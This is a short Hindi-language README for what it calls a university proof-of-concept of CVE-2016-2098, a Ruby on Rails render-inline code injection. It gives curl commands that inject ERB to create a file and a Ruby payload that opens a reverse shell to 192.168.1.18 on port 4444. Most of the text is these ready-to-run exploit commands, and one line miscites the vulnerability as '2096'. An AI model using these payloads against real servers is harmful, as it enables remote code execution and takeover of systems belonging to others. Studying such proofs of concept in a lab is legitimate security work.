
अवधारणा का प्रमाण CVE-2016-2098
@alejandro-marting द्वारा बनाई गई विश्वविद्यालय परियोजना जहां हम भेद्यता 2096 की जांच कर सकते हैं
उपयोग करते हुए:
##निष्पादन: सबसे पहले हमें निम्नलिखित कमांड के साथ रेल्स सर्वर चलाने की आवश्यकता है:
$ rvmsudo rails server -b 0.0.0.0 -p 80
अब हम निम्नलिखित कमांड के साथ रिमोट कोड निष्पादन का कारण बन सकते हैं:
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
(एक रूटेड फ़ाइल जनरेट होनी चाहिए)
अगर आप रूबी कोड इंजेक्शन के साथ एक रिवर्स शेल आज़माना चाहते हैं, तो आप निम्नलिखित कमांड चला सकते हैं:
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
यदि आपका कोई प्रश्न है तो कृपया मुझसे संपर्क करें!